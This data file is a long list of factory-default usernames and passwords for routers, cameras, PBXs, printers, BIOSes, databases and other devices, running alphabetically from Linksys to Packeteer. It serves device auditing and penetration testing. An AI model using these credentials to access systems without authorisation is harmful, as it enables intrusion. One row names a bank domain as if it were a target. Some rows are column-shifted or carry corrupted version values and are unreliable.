-Linksys,WAG54GS,,Multi,admin,admin,Admin, -Linksys,WAP11,,Multi,,,Admin, -Linksys,WAP54G,2,HTTP,,admin,Admin, -Linksys,WRT54G,,HTTP,admin,admin,Admin, -Linksys,WRT54G,All Revisions,HTTP,,admin,Admin, -Linksys,WRT54GS,V4,HTTP,admin,admin,Admin, -Linksys,model WRT54GC compact wireless-G broadband router,,Multi,,admin,Admin, -Linksys,model WRT54GC compact,,Multi,,admin,Admin, -Linksys,rv082,,Multi,admin,,Admin, -Linksys/Cisco,RTP300 w/2 phone ports,1,HTTP,admin,admin,Admin, -Linksys/Cisco,RTP300 w/2 phone ports,1,HTTP,user,tivonpw,update access,use for flashing firmware -Linunx,Linux,,Console,Administrator,admin,Admin, -Linux Mint,Linux Mint Live session,20.2,Uma/CLI/Login,mint,,user, -Linux,Bankmandiri.co.id,,HTTP,Administrator,,Admin, -Linux,Slackware,,Multi,satan,,User, -Linux,Slackware,ANY,Multi,satan,,user, -Linux,UCLinux for UCSIMM,,Multi,root,uClinux,Admin, -Livingston,IRX 
Router,,Telnet,!root,,, -Livingston,IRX Router,,Telnet,!root,,Admin, -Livingston,Livingston Portmaster 3,,Telnet,!root,,, -Livingston,Livingston officerouter,,,!root,blank,, -Livingston,Officerouter,,Telnet,!root,,, -Livingston,Officerouter,,Telnet,!root,,Admin, -Livingstone,Portmaster 2R,,Telnet,root,,Admin, -Lockdown Networks,All Lockdown Products,up to 2.7,Console,setup,changeme (exclamation),User, -Lockdown,All Lockdown Products,up to 2.7,Console,setup,changeme (exclamation),User, -LogiLink,WL0026,1.68,,admin,1234,Admin,Realtek chipset. Default IP 192.168.2.1 -Logitech,Logitech Mobile Headset,,Bluetooth,,0,audio access,Thierry Zoller (Thierry@sniff-em.com) -Lucent,AP-1000,,,public,private,Admin, -Lucent,AP-1000,,,public,public,, -Lucent,Anymedia,,Console,LUCENT01,UI-PSWD-01,Admin, -Lucent,Anymedia,,Console,LUCENT01,UI-PSWD-01,Admin,requires GSI software -Lucent,Anymedia,,Console,LUCENT02,UI-PSWD-02,Admin, -Lucent,Anymedia,,Console,LUCENT02,UI-PSWD-02,Admin,requires GSI software -Lucent,B-STDX9000,,Multi,(any 3 characters),cascade,, -Lucent,B-STDX9000,,debug mode,,cascade,, -Lucent,B-STDX9000,all,SNMP,,cascade,Admin, -Lucent,CBX 500,,Multi,(any 3 characters),cascade,, -Lucent,CBX 500,,SNMP readwrite,,cascade,, -Lucent,CBX 500,,debug mode,,cascade,, -Lucent,Cajun Family,,,root,root,, -Lucent,Cellpipe 22A-BX-AR USB D,,Console,admin,AitbISP4eCiG,Admin, -Lucent,Cellpipe,20A-GX-UK,Console,,admin,Admin, -Lucent,GX 550,,Multi,(any 3 characters),cascade,, -Lucent,GX 550,,SNMP readwrite,,cascade,, -Lucent,GX 550,,debug mode,,cascade,, -Lucent,MAX,,Multi,,,Admin, -Lucent,MAX-TNT,,Multi,admin,Ascend,, -Lucent,PSAX 1200 and below,,Multi,root,ascend,, -Lucent,PSAX 1250 and above,,Multi,readonly,lucenttech2,, -Lucent,PSAX 1250 and above,,Multi,readonly,lucenttech2,Admin, -Lucent,PSAX 1250 and above,,Multi,readwrite,lucenttech1,, -Lucent,PSAX 1250 and above,,Multi,readwrite,lucenttech1,Admin, -Lucent,PacketStar,,Multi,Administrator,,Admin, -Lucent,Packetstar 
(PSAX),,,readwrite,lucenttech1,, -Lucent,Portmaster 2,,,!root,,, -Lucent,System 75,,,bciim,bciimpw,, -Lucent,System 75,,,bcim,bcimpw,, -Lucent,System 75,,,bcms,bcmspw,, -Lucent,System 75,,,bcnas,bcnaspw,, -Lucent,System 75,,,blue,bluepw,, -Lucent,System 75,,,browse,browsepw,, -Lucent,System 75,,,browse,looker,, -Lucent,System 75,,,craft,craft,, -Lucent,System 75,,,craft,craftpw,, -Lucent,System 75,,,cust,custpw,, -Lucent,System 75,,,enquiry,enquirypw,, -Lucent,System 75,,,field,support,, -Lucent,System 75,,,inads,inads,, -Lucent,System 75,,,inads,indspw,, -Lucent,System 75,,,init,initpw,, -Lucent,System 75,,,locate,locatepw,, -Lucent,System 75,,,maint,maintpw,, -Lucent,System 75,,,maint,rwmaint,, -Lucent,System 75,,,nms,nmspw,, -Lucent,System 75,,,rcust,rcustpw,, -Lucent,System 75,,,support,supportpw,, -Lucent,System 75,,,tech,field,, -M-M-O,Webrealm,,HTTP,Administrator,admin,Admin, -MERCURY,234234,234234,SNMP,Administrator,admin,Admin, -MERCURY,KT133A/686B,,SNMP,Administrator,admin,Admin, -MICROSOFT,NT,4,,free user,user,, -MX Linux,MX Linux Live Medium,MX-19.4.1,CLI/Login,demo,demo,user, -MX Linux,MX Linux Live Medium,MX-19.4.1,CLI/Login,root,root,superuser, -MX Linux,MX Linux,,,Free4Me,free4me,Admin, -MacSense,X-Router Pro,,,admin,admin,Admin, -MachSpeed,PC BIOS,,Console,,sp99dd,Admin, -Macromedia,Dreamweaver,,FTP,,admin,Guest, -Magic-Pro,PC BIOS,,Console,,prost,Admin, -Mambo,Site Server,4.x,HTTP,admin,admin,Administrator,http://sourceforge.org/projects/mambo -Manjaro,Manjaro Live System,Linux User,manjaro,manjaro,user access,, -Manjaro,Manjaro Live System,Linux User,root,manjaro,sudo access,, -March Networks,IP Camera system,,HTTP,admin,,, -Marconi,Fore ATM Switches,,Multi,ami,,Admin, -McAfee,SCM 3100,4.1,Multi,scmadmin,scmchangeme,Admin, -McData,FC Switches/Directors,,Multi,Administrator,password,Admin, -McData,i10k Switch,,,McdataSE,redips,admin, -Mediatrix,MDD 2400/2600,,Console,administrator,,Admin, -Megastar,BIOS,,Console,,star,Admin, -Megastar,PC 
BIOS,,Console,,star,Admin, -Mentec,Micro/RSX,,,MICRO,RSX,Admin, -Mentec,Micro/RSX,,Multi,MICRO,RSX,Admin, -Meridian,PBX,ANY,Telnet,service,smile,System, -Meridian,PBX,ANY,Telnet,service,smile,System,This is the default password on most Meridian systems. -Merit Lilin,IP Camera system,,HTTP,Camera,admin pass,, -Merit Lilin,IP Camera system,,HTTP,Recorder,admin / 1111,, -Messoa,IP Camera system,,HTTP,admin,Model# of camera,, -Micron,,bios,,,,, -Micron,PC BIOS,,Console,,xyzall,Admin, -Micronet,3351 / 3354,,Multi,admin,epicrouter,Admin, -Micronet,Access Point,SP912,Telnet,root,default,Admin, -Micronet,Micronet SP5002,,Console,mac,,Admin, -Micronics,PC BIOS,,Console,,dn_04rjc,Admin, -Microplex,Print Server,,Telnet,root,root,Admin, -Microprocessing,,,,,,,h3kdocs/H3R25C04.pdf -Microsoft,Base Station Access Point,,HTTP,,admin,Admin, -Microsoft,MN-500 Wireless Base Station,,Multi,admin,admin,Admin, -Microsoft,SQL Server,7,Multi,sa,(blank),Admin, -Microsoft,Windows NT,,Multi,(null),,User,Redbutton Hole -Microsoft,Windows NT,,Multi,Guest,,User, -Microsoft,Windows NT,,Multi,User,User,User, -Microsoft,Windows NT,All,,Administrator,,, -Microsoft,Windows NT,All,,Guest,,, -Microsoft,Windows NT,All,,Mail,,, -MikroTik,All Routers,ANY,Telnet/SSH/Webfig/Winbox,admin,,Admin,The default IP Address is 192.168.88.1/24 on ether1 port -Mikrotik,Mikrotik,,Telnet,admin,,Admin, -Mikrotik,Router OS,2/9/2017,HTTP,admin,,Admin, -Mikrotik,Router OS,42775,HTTP,admin,,Admin, -Mikrotik,Router OS,all,Telnet,admin,,Admin,also for SSH and Web access -Milan,mil-sm801p,,Multi,root,root,Admin, -Minolta PagrPro,QMS 4100GN PagePro,,HTTP,,sysadm,Admin, -Minolta QMS,Magicolor 3100,3.0.0,HTTP,admin,,Admin,Gives access toAccounting -Minolta QMS,Magicolor 3100,3.0.0,HTTP,operator,,Admin, -Mintel,Mintel PBX,,,,SYSTEM,Admin, -Mitel,3300 ICP,all,HTTP,system,password,Admin, -Mitel,SX2000,all,Multi,,,Admin, -Mobotix,IP Camera system,,HTTP,admin,meinsm,, -Motorola,Cablerouter,,Telnet,cablecom,router,Admin, 
-Motorola,Motorola Cablerouter,,,cablecom,router,Admin, -Motorola,Motorola-Cablerouter,,,cablecom,router,, -Motorola,SBG900,,HTTP,admin,motorola,Admin, -Motorola,SURFboard,SBV5120,HTTP,admin,motorola,Admin, -Motorola,WR850G,4.03,HTTP,admin,motorola,Admin,higher revisions likely the same -Motorola,Wireless Router,WR850G,HTTP,admin,motorola,Admin, -Multi-Tech,ProxyServer,,Multi,supervisor,,Admin, -Mutare Software,EVM Admin,All,HTTP,,admin,Admin,http://www.mutare.com/data/kb/EVMAdminGuide.pdf -Mutare,EVM Admin,All,HTTP,,admin,Admin,http://www.mutare.com/data/kb/ -MySQL,MySQL,,Any,root,,Admin, -NAI,Entercept,,Management console,GlobalAdmin,GlobalAdmin,Admin,must be changed at 1st connection -NAI,Intrushield IPS,1200/2600/4000,SSH + Web console,admin,admin123,Admin, -NAI,Intrushield IPS,1200/2600/4000,SSH + Web,admin,admin123,Admin, -NCR,NCR UNIX,,Multi,ncrm,ncrm,Admin, -NEC,WARPSTAR-BaseStation,,Telnet,,,Admin, -NETGEAR,DG834G,3,,admin,password,, -NETIO 4All,PowerPDU 4C,Firmware 3.4.0 and later,HTTP,admin,admin,Administrator,https://www.netio-products.com/files/download/sw/version/NETIO-4x-MANUAL-en_1-3-0.pdf -NGSec,NGSecureWeb,,HTTP,admin,,Admin, -NGSec,NGSecureWeb,,HTTP,admin,asd,Admin, -NOKIA,7360,,Multi,,9999,Admin, -NOMADIX,AG5000,,Telnet,admin,,Admin, -NRG or RICOH,DSc338 Printer,1.19,HTTP,,password,Admin,no user -Nanoteq,NetSeq firewall,*,,admin,NetSeq,, -NeXT,,NeXTStep 3.3,,me,,, -NeXT,NeXTStep,,Multi,root,NeXT,Admin, -NetApp,NetCache,any,,admin,NetCache,Admin, -NetGear,Comcast,Comcast-supplied,HTTP,comcast,1234,diagnostics page,192.168.0.1/docsisdevicestatus.html -NetGear,RM356,,Telnet,,1234,Admin,shutdown the router via internet -NetGear,WGT624,,HTTP,admin,password,admin, -NetGear,WGT624,2,HTTP,admin,password,Admin, -NetGenesis,NetAnalysis Web Reporting,,HTTP,naadmin,naadmin,Admin, -Netcomm,NB1300,,HTTP,admin,password,Admin, -Netgaer,RH328,,,,1234,, -Netgea,FR314,,HTTP,admin,password,Admin, -Netgear,ADSL Modem DG632,V3.3.0a_cx,HTTP,admin,password,Admin, 
-Netgear,CG814CCR,2,Multi,cusadmin,highspeed,Admin,Comcast small business router. Default access at 10.1.10.1 -Netgear,DM602,,FTP Telnet and HTTP,admin,password,Admin, -Netgear,FR114P,,HTTP,admin,password,Admin, -Netgear,FSM7326P 24+2 L3 mANAGED PoE Switch,,HTTP,admin,,Admin, -Netgear,FSM7326P 24+2 L3 mANAGED,,HTTP,admin,,Admin, -Netgear,FVS114,GR,HTTP,admin,password,Admin, -Netgear,FVS318,,HTTP,admin,password,Admin, -Netgear,FWG114P,,Multi,,admin,password, -Netgear,GS724t,V1.0.1_1104,HTTP,,password,Admin, -Netgear,GSM7224,,HTTP,admin,,Admin, -Netgear,ISDN-Router RH348,,,,1234,, -Netgear,ME102,,SNMP,,private,Admin,Standard IP-Address is 192.168.0.5 -Netgear,MR-314,3.26,HTTP,admin,1234,Admin, -Netgear,MR314,,Multi,admin,1234,Admin, -Netgear,MR814,,HTTP,admin,password,Admin, -Netgear,MR814,v1,HTTP,admin,password,Admin, -Netgear,RH338,,HTTP,,1234,Admin, -Netgear,RH338,,HTTP,,1234,admin, -Netgear,RH438,,HTTP,,1234,, -Netgear,RH438/ISDN-Router RH348,,HTTP,,1234,Admin, -Netgear,RO318,,Multi,admin,1234,Admin, -Netgear,RP114,3.20-3.26,HTTP,admin,1234,Admin,default http://192.168.0.1 -Netgear,RP114,3.26,Telnet,,1234,Admin, -Netgear,RP614,,HTTP,admin,password,Admin, -Netgear,RT112,,HTTP,admin,1250,, -Netgear,RT311,,HTTP,admin,1234,, -Netgear,RT311,,HTTP,admin,1234,Admin, -Netgear,RT314,,HTTP,admin,1234,, -Netgear,RT314,,HTTP,admin,admin,Admin, -Netgear,RT314,Any,,Admin,1234,, -Netgear,RT338,,,,1234,, -Netgear,ReadyNas Duo,RND2000,,admin,infrant1,Admin,Upto v3 firmware -Netgear,ReadyNas Duo,RND2000,,admin,netgear1,Admin,v4 firmware onwards -Netgear,Router/Modem,,Multi,admin,password,Admin, -Netgear,WG602,1.7.x,HTTP,admin,password,Admin,Default IP: DHCP or 192.168.0.227 -Netgear,WG602,Firmware Version 1.04.0,HTTP,super,5777364,Admin, -Netgear,WG602,Firmware Version 1.5.67,HTTP,super,5777364,Admin, -Netgear,WG602,Firmware Version 1.7.14,HTTP,superman,21241036,Admin, -Netgear,WG602,Firmware Version,HTTP,super,5777364,Admin, -Netgear,WG602,Firmware 
Version,HTTP,superman,21241036,Admin, -Netgear,WGR614,,Multi,admin,password,admin, -Netgear,WGR614,9,,admin,password,Admin,192.168.1.1 OR www.routerlogin.net -Netgear,WGR614,v4,Multi,admin,password,Admin,192.168.0.1 OR www.routerlogin.net -Netgear,WGR614,v6,HTTP,admin,draadloos,Admin,Dutch routers -Netgear,WGT624,,Serial console,Gearguy,Geardog,Admin,see http://wiki.openwrt.org/OpenWrtDocs/Hardware/Netgear/WGT624 -Netgear,WGT634U,,HTTP,admin,password,Admin, -Netgear,WPN824 / WPN824v2,,HTTP,admin,password,admin, -Netgear,Wifi Router,WGT 624 v3,HTTP,admin,password,Admin,slawcio26 -Netgear,dg834g,,HTTP,admin,password,Admin,it should be work also with dg834gt -Netopia,3351,,Multi,,,Admin, -Netopia,4542,,Multi,admin,noway,Admin, -Netopia,455,v3.1,,,,, -Netopia,Netopia 7100,,,,,, -Netopia,Netopia 9500,,,netopia,netopia,, -Netopia,Netopia 9500,,Telnet,netopia,netopia,Admin, -Netopia,R910,,Multi,admin,,Admin, -Netport,Express 10/100,,multi,setup,setup,Admin, -Netscape,Netscape Enterprise Server,,HTTP,admin,admin,, -Netscape,Netscape Enterprise Server,,HTTP,admin,admin,Administrator, -Netscreen,,,,netscreen,netscreen,, -Netscreen,Firewall,,multi,netscreen,netscreen,Admin, -Netscreen,NS-5/NS10/NS-100,2,,netscreen,netscreen,, -Netscreen,firewall,,Multi,admin,,Admin, -Netscreen,firewall,,Telnet,Administrator,,Admin, -Netscreen,firewall,,Telnet,operator,,Admin, -Netstar,Netpilot,,Multi,admin,password,Admin,http://www.netpilot.com/products/netpilot/faq/default.asp -Network Appliance,NetCache,any,Multi,admin,NetCache,Admin, -Network Associates,WebShield Security Appliance e250,,HTTP,e250,e250changeme,Admin, -Network Associates,WebShield Security Appliance e500,,HTTP,e500,e500changeme,Admin, -Network Associates,WebShield Security,,HTTP,e250,e250changeme,Admin, -Network Associates,WebShield Security,,HTTP,e500,e500changeme,Admin, -Network Everywhere,NWR11B,,HTTP,,admin,Admin, -NetworkICE,ICECap Manager,2.0.22 <,8081,iceman,,Admin, -Niksun,NetDetector,,Multi,vcr,NetVCR,Admin,su 
after login with empty password -Nimble,BIOS,,Console,,xdfk9874t3,Admin, -Nimble,PC BIOS,,Console,,xdfk9874t3,Admin, -Nokia,ADSL router M1921,,Telnet,,nokia,Admin, -Nokia,All Router Models,G-240W-F,HTTP,admin,,admin, -Nokia,DSL Router M1122,1.1-1.2,Multi,m1122,m1122,User, -Nokia,M1122,unknown,Multi,,Telecom,Admin,New Zealand -Nokia,M1921,,Telnet,,nokai,Admin, -Nokia,MW1122,,Multi,telecom,telecom,Admin, -Nokia,MW1122,,Multi,telecom,telecom,Admin,Only in New Zealand. -Norman,5.3,,Multi,,,Admin, -Nortel,Accelar (Passport) 1000 series routing switches,,Multi,l2,l2,Layer 2 Read Write, -Nortel,Accelar (Passport) 1000 series routing switches,,Multi,l3,l3,Layer 3 (and layer 2) Read Write, -Nortel,Accelar (Passport) 1000 series routing switches,,Multi,ro,ro,Read Only, -Nortel,Accelar (Passport) 1000 series routing switches,,Multi,rw,rw,Read Write, -Nortel,Accelar (Passport) 1000 series routing switches,,Multi,rwa,rwa,Read Write All, -Nortel,Bay,,Console,,,Admin, -Nortel,Baystack 350-24T,,Telnet,,secure,Admin, -Nortel,Baystack 450T sw V.4.1.0.6,,,,secure,, -Nortel,Business Communications Manager,3.5 and 3.6,HTTPS,supervisor,PlsChgMe,Admin,there is an exclamation point at the end of the password -Nortel,Contivity Extranet Switches,2.x,,admin,setup,, -Nortel,Contivity,Extranet/VPN switches,HTTP,admin,setup,Admin, -Nortel,Extranet Switches,,Multi,admin,setup,Admin, -Nortel,Matra 6501 PBX,,Console,,0,Admin, -Nortel,Meridian 1 PBX,OS Release 2,,0,0,, -Nortel,Meridian CCR,,Multi,ccrusr,ccrusr,User account, -Nortel,Meridian CCR,,Multi,disttech,4tas,engineer account,enter 3letter of day from yesterday an tomorrow (for Tuesday enter MonWed case sensitive) - may be twice to see root password in clear -Nortel,Meridian CCR,,Multi,maint,maint,Maintenance account, -Nortel,Meridian CCR,,Multi,service,smile,general engineer account, -Nortel,Meridian Link,,Multi,disttech,4tas,engineer account, -Nortel,Meridian Link,,Multi,maint,maint,Maintenance account, -Nortel,Meridian 
Link,,Multi,mlusr,mlusr,user account, -Nortel,Meridian Link,,Multi,service,smile,general engineer account, -Nortel,Meridian MAX,,Multi,maint,ntacdmax,Maintenance account, -Nortel,Meridian MAX,,Multi,root,3ep5w2u,Admin, -Nortel,Meridian MAX,,Multi,service,smile,general engineer account, -Nortel,Meridian PBX,,Serial,login,0,,AUTH codes in LD 8 -Nortel,Meridian PBX,,Serial,login,1111,,AUTH codes in LD 8 -Nortel,Meridian PBX,,Serial,login,8429,,AUTH codes in LD 8 -Nortel,Meridian PBX,,Serial,spcl,0,,AUTH codes in LD 8 -Nortel,Meridian,,Multi,,,Admin, -Nortel,Norstar Modular ICS,,,**ADMIN (**23646),ADMIN (23646),Admin, -Nortel,Norstar,,Console,266344,266344,Admin, -Nortel,Passport 2430,,Telnet,Manager,,Admin, -Nortel,Phone System,All,From Phone,,266344,Installers, -Nortel,Remote Annex 2000,,,admin,(ip address),Admin, -Nortel,Remote Office 9150,,Client,admin,root,Admin, -Nortel,Shasta,any,,admin,admin,, -Nortel,VPN Gateway,,Console,admin,admin,Admin, -Northern,IP Camera system,,HTTP,admin,12345,, -Novell,NetWare,Any,,GATEWAY,,, -Novell,NetWare,Arcserve,,CHEY_ARCHSVR,WONDERLAND,, -Novell,Netware,,Multi,ADMIN,ADMIN,, -Novell,Netware,,Multi,ARCHIVIST,,, -Novell,Netware,,Multi,BACKUP,,, -Novell,Netware,,Multi,CHEY_ARCHSVR,,, -Novell,Netware,,Multi,FAX,,, -Novell,Netware,,Multi,FAXUSER,,, -Novell,Netware,,Multi,FAXWORKS,FAXWORKS,, -Novell,Netware,,Multi,GATEWAY,,, -Novell,Netware,,Multi,GUEST,GUEST,, -Novell,Netware,,Multi,GUEST,GUESTGUEST,, -Novell,Netware,,Multi,HPLASER,,, -Novell,Netware,,Multi,LASER,,, -Novell,Netware,,Multi,LASERWRITER,LASERWRITER,, -Novell,Netware,,Multi,MAIL,,, -Novell,Netware,,Multi,POST,,, -Novell,Netware,,Multi,PRINT,,, -Novell,Netware,,Multi,PRINTER,,, -Novell,Netware,,Multi,ROOT,,, -Novell,Netware,,Multi,ROUTER,,, -Novell,Netware,,Multi,SUPERVISOR,NETFRAME,, -Novell,Netware,,Multi,SUPERVISOR,NF,, -Novell,Netware,,Multi,SUPERVISOR,SUPERVISOR,, -Novell,Netware,,Multi,SUPERVISOR,SYSTEM,, -Novell,Netware,,Multi,TEST,,, 
-Novell,Netware,,Multi,USER_TEMPLATE,USER_TEMPLATE,, -Novell,Netware,,Multi,WANGTEK,WANGTEK,, -Novell,Netware,,Multi,WINDOWS_PASSTHRU,WINDOWS_PASSTHRU,, -Novell,Netware,,Multi,WINSABRE,SABRE,, -Novell,iChain,1.5,Console,,san fran 8,Admin, -Novell,iChain/ICS,1.2 2.0,Telnet,,root,Admin, -Nullsoft,Shoutcast,1/9/2005,PLS,admin,changeme,Admin, -Nullsoft,Shoutcast,38361,PLS,admin,changeme,Admin, -Nurit,PC BIOS,,Console,$system,,Admin, -OCE,Printers,Hardware,HTTP,,0 and the number of OCE printer,Admin, -OCS Inventory NG,OCS Inventory,ANY,HTTP,admin,admin,Administrator,https://wiki.ocsinventory-ng.org/03.Basic-documentatiodministration-of-OCS-Inventory-NG/ -ODS,1094 IS Chassis,4.x,,ods,ods,, -OKI,6120e and 421n,,HTTP,admin,OkiLAN,Admin, -OKI,C5700,,HTTP,root,the 6 last digit of the MAC adress,Admin,running with other models -OMRON,MR104FH,,Multi,,,Admin, -OPEN Networks,812L,,HTTP,root,0P3N,Admin, -OPNsense,OPNsense,ANY,HTTP,root,OPNsense,Administrator,https://docs.opnsense.org/ -ORiNOCO,Access Server,2.01,Telnet,,orinoco,Admin, -Offensive Security,Kali Linux,1.0.0 - 2019.4,Linux User (e.g. SSH & SFTP),root,toor,admin, -Offensive Security,Kali Linux,2020.1+,Linux User (e.g. 
SSH & SFTP),kali,kali,sudo access,https://www.kali.org/docs/introduction/default-credentials/ -Omnitronix,Data-Link,DL150,Multi,,SMDR,Admin, -Omnitronix,Data-Link,DL150,Multi,,SUPER,Admin, -Omuron,MR104FH,,Multi,,,Admin, -OpenConnect,OC://WebConnect Pro,,Multi,admin,OCS,Admin, -OpenConnect,OC://WebConnect Pro,,Multi,adminstat,OCS,Admin, -OpenConnect,OC://WebConnect Pro,,Multi,adminuser,OCS,Admin, -OpenConnect,OC://WebConnect Pro,,Multi,adminview,OCS,Admin, -OpenConnect,OC://WebConnect Pro,,Multi,helpdesk,OCS,Admin, -OpenNetAdmin,OpenNetAdmin,ANY,HTTP,admin,admin,Administrator,https://github.com/opennetadmin/ona/blob/master/docs/INSTALL -Openwave,MSP,Any,HTTP,cac_admin,cacadmin,Admin, -Openwave,WAP Gateway,Any,HTTP,sys,uplink,Admin, -Optivision,Nac 3000 & 4000,any,,root,mpegvideo,, -Optus,Counter-Strike,1.3,Multi,Administrator,admin,Admin, -Oracle,7 or later,,,system,manager,, -Oracle,7 or later,Any,,Scott,Tiger,, -Oracle,8i,all,,internal,oracle,, -Oracle,Finacial Package,,SAP,SAPR3,SAP,Admin, -Oracle,Glassfish,ANY,HTTP,admin,admin,Administrator,https://docs.oracle.com/cd/E19798-01/821-1751/ghgpu/index.html -Oracle,Oracle RDBMS,7 and 8,Multi,ADAMS,WOOD,, -Oracle,Oracle RDBMS,7 and 8,Multi,APPS,APPS,, -Oracle,Oracle RDBMS,7 and 8,Multi,AURORA@ORB@UNAUTHENTICATED,INVALID,, -Oracle,Oracle RDBMS,7 and 8,Multi,CTXSYS,CTXSYS,DBA, -Oracle,Oracle RDBMS,7 and 8,Multi,DBSNMP,DBSNMP,RESOURCE and CONNECT roles, -Oracle,Oracle RDBMS,7 and 8,Multi,MDSYS,MDSYS,All Privileges with Admin, -Oracle,Oracle RDBMS,7 and 8,Multi,NAMES,NAMES,, -Oracle,Oracle RDBMS,7 and 8,Multi,ORDPLUGINS,ORDPLUGINS,, -Oracle,Oracle RDBMS,7 and 8,Multi,OUTLN,OUTLN,, -Oracle,Oracle RDBMS,7 and 8,Multi,SYSADM,SYSADM,, -Oracle,Oracle RDBMS,7 and 8,Multi,SYSTEM,MANAGER,, -Oracle,Oracle RDBMS,8i Linux,Multi,MODTEST,YES,DBA, -Oracle,Oracle RDBMS,8i WinNT,Multi,MTYSYS,MTYSYS,, -Oracle,Oracle RDBMS,8i WinNT,Multi,RMAIL,RMAIL,, -Oracle,Oracle RDBMS,8i WinNT,Multi,SAMPLE,SAMPLE,DBA, -Oracle,Oracle 
RDBMS,8i,Multi,,,Admin, -Oracle,Oracle RDBMS,8i,Multi,AQUSER,AQUSER,, -Oracle,Oracle RDBMS,8i,Multi,CATALOG,CATALOG,, -Oracle,Oracle RDBMS,8i,Multi,CDEMOCOR,CDEMOCOR,, -Oracle,Oracle RDBMS,8i,Multi,CDEMOUCB,CDEMOUCB,, -Oracle,Oracle RDBMS,8i,Multi,COMPANY,COMPANY,All Privileges, -Oracle,Oracle RDBMS,8i,Multi,DEMO8,DEMO8,, -Oracle,Oracle RDBMS,8i,Multi,EVENT,EVENT,DBA, -Oracle,Oracle RDBMS,8i,Multi,FND,FND,, -Oracle,Oracle RDBMS,8i,Multi,GPLD,GPLD,, -Oracle,Oracle RDBMS,8i,Multi,MILLER,MILLER,, -Oracle,Oracle RDBMS,8i,Multi,POWERCARTUSER,POWERCARTUSER,, -Oracle,Oracle RDBMS,8i,Multi,PUBSUB,PUBSUB,DBA, -Oracle,Oracle RDBMS,8i,Multi,SECDEMO,SECDEMO,, -Oracle,Oracle RDBMS,8i,Multi,TSDEV,TSDEV,, -Oracle,Oracle RDBMS,8i,Multi,USER0,USER0,, -Oracle,Oracle RDBMS,8i,Multi,USER2,USER2,, -Oracle,Oracle RDBMS,8i,Multi,USER4,USER4,, -Oracle,Oracle RDBMS,8i,Multi,USER6,USER6,, -Oracle,Oracle RDBMS,8i,Multi,USER8,USER8,, -Oracle,Oracle RDBMS,8i,Multi,VRR1,VRR1,DBA, -Oracle,Oracle RDBMS,Any,Multi,system/manager,sys/change_on_install,Admin, -Oracle,OracleRDBMS,8i,Multi,AQUSER,AQUSER,admin, -Oracle,OracleRDBMS,8i,Multi,FND,FND,, -Oracle,Web DB,,HTTP,webdb,webdb,Admin, -Oracle,Web DB,,HTTP,webgb,webdb,, -Osicom (Datacom),Osicom(Datacom),,,sysadm,sysadm,, -Osicom,JETXPrint,1000E/B,Telnet,sysadm,sysadm,Admin, -Osicom,JETXPrint,1000E/N,Telnet,sysadm,sysadm,Admin, -Osicom,JETXPrint,1000T/N,Telnet,sysadm,sysadm,Admin, -Osicom,JETXPrint,500 E/B,Telnet,sysadm,sysadm,Admin, -Osicom,NETCommuter Remote Access Server,,Telnet,debug,d.e.b.u.g,User, -Osicom,NETCommuter Remote Access Server,,Telnet,guest,guest,User, -Osicom,NETCommuter Remote Access Server,,Telnet,sysadm,sysadm,Admin, -Osicom,NETCommuter Remote,,Telnet,sysadm,sysadm,Admin, -Osicom,NETCommuter,Telnet,Manager,Manager,Admin,,No -Osicom,NETCommuter,Telnet,debug,d.e.b.u.g,User,,No -Osicom,NETCommuter,Telnet,echo,echo,User,,No -Osicom,NETCommuter,Telnet,guest,guest,User,,No -Osicom,NETCommuter,Telnet,sysadm,sysadm,Admin,,No 
-Osicom,NETPrint and JETX Print,500 1000 1500 and 2000 Series,Telnet,sysadm,sysadm,Admin, -Osicom,NETPrint and JETX Print,500 1000 1500 and,Telnet,sysadm,sysadm,Admin, -Osicom,NETPrint,1000 T/B,Telnet,sysadm,sysadm,Admin, -Osicom,NETPrint,1000 T/N,Telnet,sysadm,sysadm,Admin, -Osicom,NETPrint,1000E/D,Telnet,debug,d.e.b.u.g,User, -Osicom,NETPrint,1000E/D,Telnet,sysadm,sysadm,Admin, -Osicom,NETPrint,1000E/NDS,Telnet,Manager,Manager,Admin, -Osicom,NETPrint,1000E/NDS,Telnet,echo,echo,User, -Osicom,NETPrint,1000E/NDS,Telnet,guest,guest,User, -Osicom,NETPrint,1000E/NDS,Telnet,sysadm,sysadm,Admin, -Osicom,NETPrint,1500 E/B,Telnet,echo,echo,User, -Osicom,NETPrint,1500 E/B,Telnet,guest,guest,User, -Osicom,NETPrint,1500 E/B,Telnet,sysadm,sysadm,Admin, -Osicom,NETPrint,1500E/N,Telnet,debug,d.e.b.u.g,User, -Osicom,NETPrint,1500E/N,Telnet,guest,guest,User, -Osicom,NETPrint,2000E/B,Telnet,sysadm,sysadm,Admin, -Osicom,NETPrint,2000E/N,Telnet,Manager,Manager,Admin, -Osicom,NETPrint,2000E/N,Telnet,echo,echo,User, -Osicom,NETPrint,2000E/N,Telnet,sysadm,sysadm,Admin, -Osicom,NETPrint,500 1000 1500 and 2000 Series,Telnet,Manager,Manager,Admin, -Osicom,NETPrint,500 1000 1500 and,Telnet,Manager,Manager,Admin, -Osicom,NETPrint,500 E/N,Telnet,sysadm,sysadm,Admin, -Osicom,NETPrint,500 T/N,Telnet,sysadm,sysadm,Admin, -Osicom,NETPrint,500,1000,1500,and 2000 Series,Telnet,Manager -Osicom,Osicom Plus T1/PLUS 56k,,,write,private,, -Osicom,Osicom Plus T1/PLUS 56k,,Telnet,write,private,, -Otenet,otenet,,Telnet,,,User, -Overland,NEO Series Libraries,,Multi,Factory,56789,Admin,Factory password under Utilities. For all functions unlocked. -PFSense,,Firewall,HTTP/HTTPS,admin,pfsense,, -PHPReactor,PHPReactor,1.2.7,HTTP,core,phpreactor,,http://freshmeat.net/projects/phpreactor/ -Pacific Micro Data,MAST 9500 Universal Disk Array,ESM ver. 2.11 / 1,Console,pmd,,Admin, -Packeteer,Packetshaper,,Console,,touchpwd=,touch,Resets ‘touch’ password. 
